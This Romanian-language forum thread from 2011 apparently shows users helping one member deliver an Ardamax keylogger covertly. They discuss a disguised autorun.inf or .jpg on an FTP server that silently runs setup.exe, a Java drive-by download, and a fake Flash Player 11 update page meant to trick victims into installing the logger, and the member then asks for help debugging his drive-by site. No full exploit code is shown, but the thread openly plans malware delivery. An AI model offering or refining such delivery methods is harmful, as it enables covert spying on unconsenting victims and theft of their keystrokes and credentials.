intrebare - autorun.inf pe ftp

[randallhax]

Salut. Sunt interesat de cum as putea face un autorun.inf care sa ruleze fisierul de la open=" ".

De ex, ftp://ftp.wintel.fi/drivers/Socket/LPeCF+/AUTORUN.INF ( ar trebui sa duca direct la ftp://ftp.wintel.fi/drivers/Socket/LPeCF+/setup.exe ).

Mentionez ca-mi trebuie pt keylogger, am avut acum cativa ani asa ceva, dar nu fusese facut de mine si l-am pierdut.. somehow.

Stie cineva script-ul? Daca reusim cumva sa-l gasim, poate fi redenumit ulterior pe linux din autorun.inf in x.jpg si sa functioneze la fel ca .inf-ul cand il urc inapoi pe ftp si ulterior accesat de pe windows?

Multumesc anticipat!

[mike_vio]

Daca scrii la open=ftp:\blablabla\setup.exe nu merge ?

[em]

Tu vrei ca acel exe sa fie rulat când? Când utilizatorul intr? pe o poz?? Dac? a?a ceva vrei afl? c? nu se poate.

[randallhax]

Daca scrii la open=ftp:\blablabla\setup.exe nu merge ?

Nu merge, la fel deschide text window cu [autorun].. etc

Tu vrei ca acel exe sa fie rulat când? Când utilizatorul intr? pe o poz?? Dac? a?a ceva vrei afl? c? nu se poate.

Da, asta vreau si sunt sigur ca se poate, stiu sigur ca am avut asa, Install.exe de la ardamax si un .jpg facut de un tip cu care nu mai am tangente din pacate, care rula Install.exe fara nici un announce. La vremea aia mergea decat pe Windows XP SP1, dar tind sa cred ca aia era din cauza versiunii vechi de Ardamax, nu a script-ului.

[em]

Nu merge, la fel deschide text window cu [autorun].. etc

Da, asta vreau si sunt sigur ca se poate, stiu sigur ca am avut asa, Install.exe de la ardamax si un .jpg facut de un tip cu care nu mai am tangente din pacate, care rula Install.exe fara nici un announce. La vremea aia mergea decat pe Windows XP SP1, dar tind sa cred ca aia era din cauza versiunii vechi de Ardamax, nu a script-ului.

Pe vremea Internet Explorer 5.5 orice era posibil!

[randallhax]

Parca mergea si pe opera.. In orice caz, ai script-ul sau ai idee unde-l gasesc, sa-l incerc eventual ? Poate-i dam de cap cumva.

edit: sau daca nu se poate cu .jpg, atunci .inf, sau orice alta solutie posibila ca logger-ul sa fie rulat de pe ftp, nu trimis pe mess, ca e cam lame..

Edited July 15, 2011 by randallhax

[em]

Doua idei

1) Java drive-by

2) V?d c? acum 2 zile a fost anun?at flash player 11. Faci o pagin? dr?gu?? în care zici c? pentru afi?area plm.swf are neap?rat? nevoie de versiunea 11. În trimi?i pe o pagin? dr?gu?? de unde descarc? loggerul.

[mike_vio]

intri in cmd si incerci pana te saturi si gasesti sintaxa corecta:

run,open,runas ftp:\\dfgfghtjyyu\setup.exe

asta ca sa il execute direct fara sa te mai intrebe browserul daca il descarci sau il rulezi. Mai nou antivirusii blocheaza din start o adresa infectata si ma indoiesc ca ai reusi ceva.

[randallhax]

Pai si presupunand ca gasesc cum sa-l ruleze direct, daca *.inf nu vrea sa functioneze ca un inf normal in nici un browser, ci ca un .txt, ce e de facut?

edit: java drive by suna bine, de fapt ambele idei sunt bune, thanks em.

[randallhax]

Ok, for some reason, java drive by thing nu merge cum trebuie. am facut totul corect, site-ul, replace-ul la wget link, etc., doar ca in momentul in care-ti cere sa dai Run, chiar daca dau, nu se intampla nimic, nu apare in procese, deci nu-l ruleaza. Installer-ul e corect facut, ca .exe-le merge bine, dar nu prin java drive by. Any ideas?